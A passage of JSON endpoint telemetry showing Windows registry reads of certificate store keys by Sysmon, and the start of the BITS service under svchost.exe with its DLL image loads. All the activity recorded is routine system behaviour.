"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\System32\\msvcr120_clr0400.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573456200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bitsperf.dll", - "image_path": "C:\\Windows\\System32\\bitsperf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573456509984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "c:\\windows\\system32\\svchost.exe -k netsvcs -p -s BITS", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 6868, - "ppid": 568, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "create", - "timestamp": 131883573456770000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "image_load", - "image_name": "svchost.exe", - "image_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "qmgr.dll", - "image_path": "C:\\Windows\\System32\\qmgr.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bitsperf.dll", - "image_path": "C:\\Windows\\System32\\bitsperf.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "FirewallAPI.dll", - "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "esent.dll", - "image_path": "C:\\Windows\\System32\\esent.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "fwbase.dll", - "image_path": "C:\\Windows\\System32\\fwbase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\PerfMMFileName", - "registry_value": "PerfMMFileName", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "registry", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "FlightSettings.dll", - "image_path": "C:\\Windows\\System32\\FlightSettings.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456980000, - "unique_pid": 